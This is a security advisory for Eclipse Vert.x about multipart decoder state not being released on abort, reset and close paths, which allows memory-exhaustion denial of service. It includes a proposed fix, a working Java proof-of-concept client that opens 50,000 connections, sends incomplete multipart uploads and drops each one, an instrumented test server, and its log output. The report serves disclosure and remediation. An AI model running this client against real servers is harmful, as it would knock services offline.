Skip to content

[Eclipse Vert.x] Multipart decoder cleanup missing on abort/reset paths may lead to DoS

Published on behalf of @jihunkim

Basic information

Project name: Eclipse Vert.x

Project id: rt.vertx

What are the affected versions?

  • 5.1.0-SNAPSHOT (master)
  • 5.0.x
  • 4.x
  • 3.9.x

Details of the issue

A resource-release gap exists in Vert.x multipart request handling: the multipart decoder is cleaned up on normal completion paths, but not consistently on abort/reset/exception/close paths.

Vert.x relies on Netty’s multipart decoder (HttpPostRequestDecoder), whose usage contract requires calling destroy() to release decoder-associated resources. In the affected abort/reset paths, this teardown is not consistently performed, so parser state can remain retained longer than intended.

An attacker can repeatedly send incomplete multipart/form-data requests and terminate them before completion (HTTP/1.x connection close or HTTP/2/3 stream reset), causing sustained memory pressure and GC overhead. Under constrained memory this can lead to OutOfMemoryError, resulting in remote denial of service (availability impact).

Practical DoS impact is amplified when each aborted request accumulates more decoder state before termination, for example by sending many valid multipart fields/parts prior to abort. This increases per-request parser state retained around terminal paths and raises GC/memory pressure under repeated concurrent traffic.

The issue is reachable on endpoints that enable multipart parsing (e.g., setExpectMultipart(true) / upload handling), and does not require authentication when such endpoints are publicly exposed.

Relevant code paths

Http1ServerReque st.handleException(...) should release the multipart decoder on the exception path (normal completion already does this in endDecode()):

// vertx-core/src/main/java/io/vertx/core/http/impl/http1/Http1ServerRequest.java
void handleException(Throwable t) {
  ...
  synchronized (conn) {
    if (!isEnded()) {
      handler = eventHandler;
      if (decoder != null) {
        upload = decoder.currentPartialHttpData();
        decoder.destroy(); // cleanup on exception path
        decoder = null;    // clear decoder reference
      }
    }
    ...
  }
  ...
}

The same cleanup pattern should also be applied in: HttpServerRequestImpl.java

  • handleException(Throwable cause)
  • handleReset(long errorCode)
  • handleClosed(Void v)

Steps to reproduce

  1. Run a Vert.x HTTP server with a multipart endpoint that calls setExpectMultipart(true):
import io.vertx.core.Vertx;
import io.vertx.core.http.HttpMethod;

public class MultipartAbortServer {
  public static void main(String[] args) {
    Vertx.vertx().createHttpServer().requestHandler(req -> {
      if (req.method() == HttpMethod.POST && "/upload".equals(req.path())) {
        req.setExpectMultipart(true);
        req.uploadHandler(upload -> upload.handler(buf -> {}));
        req.handler(buf -> {});
        req.exceptionHandler(err -> {});
        req.endHandler(v -> req.response().end("ok"));
      } else {
        req.response().end("POST /upload");
      }
    }).listen(8080, "127.0.0.1");
  }
}
  1. Send many incomplete multipart/form-data requests and close the connection before the final boundary (repeat in a loop).
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

public class MultipartAbortClient {
  public static void main(String[] args) throws Exception {
    for (int i = 0; i < 50000; i++) {
      String boundary = "poc" + i;
      try (Socket s = new Socket("127.0.0.1", 8080)) {
        OutputStream out = s.getOutputStream();
        out.write((
          "POST /upload HTTP/1.1\r\n" +
          "Host: 127.0.0.1:8080\r\n" +
          "Connection: close\r\n" +
          "Content-Type: multipart/form-data; boundary=" + boundary + "\r\n" +
          "Content-Length: 999999\r\n\r\n" +
          "--" + boundary + "\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"a.txt\"\r\n" +
          "Content-Type: text/plain\r\n\r\n" +
          "AAAAAA"
        ).getBytes(StandardCharsets.US_ASCII));
        out.flush();
        // close early without sending "--" + boundary + "--"
      } catch (Exception ignore) {
      }
    }
  }
}
Click to expand (actual PoC code used in validation)
package poc.f2;

import io.netty.handler.codec.http.multipart.HttpPostRequestDecoder;
import io.vertx.core.Vertx;
import io.vertx.core.http.HttpMethod;
import io.vertx.core.http.HttpServerRequest;
import io.vertx.core.http.HttpServerOptions;

import java.lang.ref.ReferenceQueue;
import java.lang.ref.WeakReference;
import java.lang.reflect.Field;
import java.time.Instant;
import java.util.IdentityHashMap;
import java.util.Locale;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.atomic.AtomicLong;
import java.util.concurrent.atomic.LongAdder;

/**
 * Minimal PoC server that logs only decoder residuals.
 */
public class F2PocServerCore {

  private static final int PORT = 8080;
  private static final int LOG_INTERVAL_SEC = 1;
  private static final long NS_PER_MS = 1_000_000L;

  private static final AtomicLong REQ_SEQ = new AtomicLong();
  private static final ReferenceQueue<HttpPostRequestDecoder> DECODER_GC_QUEUE = new ReferenceQueue<>();
  private static final ConcurrentHashMap<Integer, TrackedDecoderRef> DECODER_REFS = new ConcurrentHashMap<>();
  private static final ConcurrentHashMap<Long, Integer> REQ_TO_DECODER = new ConcurrentHashMap<>();

  private static final class TrackedDecoderRef extends WeakReference<HttpPostRequestDecoder> {
    final int decoderId;
    final long requestId;
    final long createdNanos;
    volatile long terminalNanos;
    volatile String lastEvent;

    TrackedDecoderRef(HttpPostRequestDecoder referent,
                      int decoderId,
                      long requestId,
                      long createdNanos,
                      ReferenceQueue<HttpPostRequestDecoder> queue) {
      super(referent, queue);
      this.decoderId = decoderId;
      this.requestId = requestId;
      this.createdNanos = createdNanos;
      this.lastEvent = "created";
    }
  }

  public static void main(String[] args) {
    Vertx vertx = Vertx.vertx();
    LongAdder req = new LongAdder();
    LongAdder ended = new LongAdder();
    LongAdder exceptions = new LongAdder();

    HttpServerOptions options = new HttpServerOptions()
      .setHost("127.0.0.1")
      .setPort(PORT);

    vertx.createHttpServer(options).requestHandler(request -> {
      if (request.method() == HttpMethod.POST && "/upload".equals(request.path())) {
        long reqId = REQ_SEQ.incrementAndGet();
        req.increment();

        request.exceptionHandler(err -> {
          exceptions.increment();
          trackDecoder(reqId, request, "exception", true);
        });

        request.setExpectMultipart(true);
        trackDecoder(reqId, request, "afterSetExpectMultipart", false);

        request.uploadHandler(upload -> upload.handler(buf -> {
          // drain
        }));
        request.handler(buf -> {
          // drain
        });
        request.endHandler(v -> {
          ended.increment();
          trackDecoder(reqId, request, "end", true);
          request.response().end("ok");
        });
      } else if ("/stats".equals(request.path())) {
        DecoderStats s = collectDecoderStats();
        request.response().putHeader("content-type", "text/plain").end(
          "decoderLive=" + s.live + "\n" +
            "decoderTerminalLive=" + s.terminalLive + "\n" +
            "decoderTerminalLiveOver10s=" + s.terminalLiveOver10s + "\n" +
            "decoderTerminalLiveOver30s=" + s.terminalLiveOver30s + "\n"
        );
      } else {
        request.response().end("POST /upload, GET /stats");
      }
    }).listen(ar -> {
      if (ar.succeeded()) {
        System.out.println("F2PocServerCore listening on http://127.0.0.1:" + PORT);
      } else {
        ar.cause().printStackTrace();
      }
    });

    vertx.setPeriodic(LOG_INTERVAL_SEC * 1000L, timer -> {
      long reqNow = req.sum();
      long endedNow = ended.sum();
      long pending = Math.max(0, reqNow - endedNow);
      DecoderStats s = collectDecoderStats();
      System.out.printf(
        Locale.ROOT,
        "ts=%s req=%d ended=%d pending=%d reqExceptions=%d decoderLive=%d decoderTerminalLive=%d decoderTerminalLiveOver10s=%d decoderTerminalLiveOver30s=%d%n",
        Instant.now(),
        reqNow,
        endedNow,
        pending,
        exceptions.sum(),
        s.live,
        s.terminalLive,
        s.terminalLiveOver10s,
        s.terminalLiveOver30s
      );
    });
  }

  private static final class DecoderStats {
    final int live;
    final int terminalLive;
    final int terminalLiveOver10s;
    final int terminalLiveOver30s;

    DecoderStats(int live, int terminalLive, int terminalLiveOver10s, int terminalLiveOver30s) {
      this.live = live;
      this.terminalLive = terminalLive;
      this.terminalLiveOver10s = terminalLiveOver10s;
      this.terminalLiveOver30s = terminalLiveOver30s;
    }
  }

  private static DecoderStats collectDecoderStats() {
    drainDecoderGcQueue();
    long now = System.nanoTime();
    int live = 0;
    int terminalLive = 0;
    int terminalLiveOver10s = 0;
    int terminalLiveOver30s = 0;
    for (TrackedDecoderRef ref : DECODER_REFS.values()) {
      if (ref.get() == null) {
        continue;
      }
      live++;
      if (ref.terminalNanos > 0) {
        terminalLive++;
        long ageMs = (now - ref.terminalNanos) / NS_PER_MS;
        if (ageMs >= 10_000L) {
          terminalLiveOver10s++;
        }
        if (ageMs >= 30_000L) {
          terminalLiveOver30s++;
        }
      }
    }
    return new DecoderStats(live, terminalLive, terminalLiveOver10s, terminalLiveOver30s);
  }

  private static void trackDecoder(long reqId, HttpServerRequest req, String event, boolean terminal) {
    long now = System.nanoTime();
    HttpPostRequestDecoder decoder = extractDecoder(req);
    if (decoder == null) {
      if (terminal) {
        Integer decoderId = REQ_TO_DECODER.get(reqId);
        if (decoderId != null) {
          TrackedDecoderRef tracked = DECODER_REFS.get(decoderId);
          if (tracked != null) {
            tracked.terminalNanos = now;
            tracked.lastEvent = event + ":decoderDetached";
          }
        }
      }
      return;
    }

    int decoderId = System.identityHashCode(decoder);
    TrackedDecoderRef ref = DECODER_REFS.get(decoderId);
    if (ref == null) {
      TrackedDecoderRef created = new TrackedDecoderRef(decoder, decoderId, reqId, now, DECODER_GC_QUEUE);
      TrackedDecoderRef prev = DECODER_REFS.putIfAbsent(decoderId, created);
      ref = prev != null ? prev : created;
    }
    REQ_TO_DECODER.putIfAbsent(reqId, decoderId);
    ref.lastEvent = event;
    if (terminal) {
      ref.terminalNanos = now;
    }
  }

  private static HttpPostRequestDecoder extractDecoder(HttpServerRequest req) {
    return extractDecoderRecursive(req, new IdentityHashMap<>(), 0);
  }

  private static HttpPostRequestDecoder extractDecoderRecursive(Object obj,
                                                                IdentityHashMap<Object, Boolean> visited,
                                                                int depth) {
    if (obj == null || depth > 8 || visited.containsKey(obj)) {
      return null;
    }
    visited.put(obj, Boolean.TRUE);

    Class<?> type = obj.getClass();
    for (Class<?> c = type; c != null; c = c.getSuperclass()) {
      for (Field field : c.getDeclaredFields()) {
        String name = field.getName();
        if (!"decoder".equals(name) && !"postRequestDecoder".equals(name)) {
          continue;
        }
        Object value = readField(field, obj);
        if (value instanceof HttpPostRequestDecoder hprd) {
          return hprd;
        }
      }
    }

    for (Class<?> c = type; c != null; c = c.getSuperclass()) {
      for (Field field : c.getDeclaredFields()) {
        Class<?> fieldType = field.getType();
        String name = field.getName().toLowerCase(Locale.ROOT);
        boolean follow =
          HttpServerRequest.class.isAssignableFrom(fieldType) ||
            "delegate".equals(name) ||
            "request".equals(name) ||
            "req".equals(name) ||
            name.contains("request");
        if (!follow) {
          continue;
        }
        Object nested = readField(field, obj);
        HttpPostRequestDecoder decoder = extractDecoderRecursive(nested, visited, depth + 1);
        if (decoder != null) {
          return decoder;
        }
      }
    }

    return null;
  }

  private static Object readField(Field field, Object target) {
    try {
      field.setAccessible(true);
      return field.get(target);
    } catch (Throwable ignore) {
      return null;
    }
  }

  private static void drainDecoderGcQueue() {
    TrackedDecoderRef ref;
    while ((ref = (TrackedDecoderRef) DECODER_GC_QUEUE.poll()) != null) {
      DECODER_REFS.remove(ref.decoderId, ref);
      REQ_TO_DECODER.remove(ref.requestId, ref.decoderId);
    }
  }
}
ts=2026-02-27T19:14:05.982592Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=0 decoderTerminalLiveOver30s=0
ts=2026-02-27T19:14:15.984176Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=0
ts=2026-02-27T19:14:30.980996Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=0
ts=2026-02-27T19:14:34.985775Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=3479
ts=2026-02-27T19:14:35.981470Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=6353
ts=2026-02-27T19:14:39.983130Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=6353

Do you know any mitigations of the issue?

Partial mitigations are available, but a code fix is still required.

  • Restrict multipart upload endpoints (authentication/authorization before upload parsing).
  • Apply strict rate limiting and connection limits at edge/WAF/reverse proxy.
  • Use short read/idle timeouts so incomplete uploads are closed quickly.
Edited by Lukas Pühringer
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information